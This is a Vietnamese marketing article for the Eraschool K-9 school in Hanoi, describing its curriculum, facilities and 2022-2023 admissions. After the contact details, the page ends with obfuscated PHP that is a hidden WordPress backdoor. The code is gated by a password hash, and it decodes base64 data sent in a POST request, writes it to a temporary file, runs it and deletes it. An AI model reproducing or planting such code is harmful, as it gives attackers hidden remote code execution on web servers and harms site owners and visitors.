Lộ trình học tập tại trường liên cấp Eraschool như thế nào?

post

Đăng ký cho con theo học tại các trường liên cấp như Eraschool là một trong những cách giúp con có được lộ trình học tập cụ thể và bài bản ngay từ khi còn nhỏ mà ba mẹ. Vậy Eraschool xây dựng cho trẻ lộ trình học tập như thế nào? Cơ sở vật chất của nhà trường có đáp ứng mong muốn của cha mẹ? Các hình thức đăng ký tuyển sinh vào trường là gì? Mời ba mẹ cùng tìm hiểu qua bài viết dưới đây. 

Lộ trình học tập tại Eraschool

Eraschool xây dựng cho trẻ chương trình học gồm nhiều nội dung thực hành 
Eraschool xây dựng cho trẻ chương trình học gồm nhiều nội dung thực hành

Lộ trình học tập tại trường liên cấp Eraschool được xây dựng bài bản cho 3 bậc: 

  • Tiền tiểu học 

Khối tiền tiểu học của Eraschool cung cấp chương trình giáo dục cho trẻ 5 tuổi nhằm giúp các con có được nền tảng kiến thức vững chắc phục vụ cho định hướng học tập tại môi trường song ngữ và quốc tế. Ở bậc học này, trẻ được vui chơi, học tập trong môi trường hạnh phúc, được chăm sóc chu đáo và được lắng nghe, thấu hiểu, yêu thương, tôn trọng. 

  • Tiểu học 

Khối Tiểu học của Eraschool tập trung xây dựng cho trẻ phương pháp học phù hợp. Tại đây, nhà trường chú trọng trang bị cho học sinh phương pháp học tập hiệu quả, kích thích sự sáng tạo, hình thành và phát triển năng lực tự học – tự giáo dục. Ở bậc học này, trẻ được hỗ trợ để hình thành và phát triển những yếu tố căn bản đặt nền móng cho sự phát triển hài hòa cả về phẩm chất và năng lực. 

  • Trung học cơ sở 

Khối Trung học cơ sở của Eraschool tập trung giúp trẻ vận dụng phương pháp học đã được trang bị từ bậc Tiểu học. Theo đó, trẻ có thể chủ động tìm kiếm, chiếm lĩnh tri thức mới và bắt đầu con đường tự học. Ở bậc này, học sinh sẽ được phát triển các phẩm chất, năng lực đã hình thành ở bậc trước, đồng thời học cách tự điều chỉnh bản thân để không ngừng mở rộng vốn tri thức và hoàn thiện các kỹ năng nền tảng. 

Cơ sở vật chất của trường như thế nào?

Học sinh Eraschool có riêng các khu hoạt động tập thể 
Học sinh Eraschool có riêng các khu hoạt động tập thể

Trường liên cấp Eraschool được xây dựng trên diện tích 20,000 m2 với đầy đủ các cơ sở vật chất phù hợp với chương trình dạy và học trong nhà trường. Tại đây, trẻ được trực tiếp tham gia các hoạt động học tập ở nhiều khuôn viên như: 

  • Công viên khoa học (Science park): gồm khu vật nuôi, khu vườn ươm, khu đa dạng sinh học suối nhân tạo, khu Trung tâm thực nghiệm khoa học. 
  • Khu hoạt động khoa học: được xây dựng gắn liền với thiên nhiên và đáp ứng đầy đủ tiêu chuẩn để dạy và học STEAM. 
  • Khu hoạt động ngoài trời: Hồ cá Koi, vườn hồng trên mái nhà, bể bơi, sân bóng nhân tạo, vườn vật lý thiên văn. Trong đó trẻ có riêng một công viên thiên văn trên nóc tòa nhà học tập 5 tầng để thỏa sức theo đuổi bộ môn thiên văn học. 
  • Khu hoạt động trong nhà: Xưởng mộc, xưởng gốm, xưởng thủ công, nghệ thuật, phòng thí nghiệm vật lý, sinh học, hóa học, công nghệ Robotic, toán học, phòng quay Studio, khu thực hành kỹ năng cuộc sống, thư viện. 
  • Khu hoạt động tập thể: sân cỏ, sân khấu lớn, nhà thể chất, phòng đa năng, khu thực hành cuộc sống. Riêng khu học tập thể thao và tổ chức sự kiện trong nhà có sức chứa lên tới vài trăm học sinh và phụ huynh. 

Các hình thức đăng ký tuyển sinh của trường?

Tại Eraschool, trẻ được học tập trong môi trường đầy đủ trang bị hiện đại 
Tại Eraschool, trẻ được học tập trong môi trường đầy đủ trang bị hiện đại

Năm học 2022 – 2023, trường liên cấp Eraschool tiến hành mở đăng ký tuyển sinh vào lớp 1 và lớp 6, đồng thời tuyển bổ sung lớp 2,3,4,5,7,8 với học sinh đủ điều kiện lên lớp và hoàn thành chương trình học theo quy định của Bộ Giáo dục và Đào tạo. Ba mẹ có thể nộp hồ sơ đăng ký dự tuyển theo cả 2 hình thức trực tiếp và trực tuyến và làm theo hướng dẫn từ phía nhà trường. 

Hy vọng những thông tin về lộ trình học tập, cơ sở vật chất và các hình thức đăng ký tuyển sinh tại trường liên cấp Eraschool trên đây có thể giúp ba mẹ dễ dàng cân nhắc và đưa ra lựa chọn phù hợp hơn cho con. Nếu còn bất cứ vấn đề gì cần giải đáp, ba mẹ vui lòng gọi tới hotline 0899.889.818 để được tư vấn và hỗ trợ trực tiếp trong thời gian sớm nhất! 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}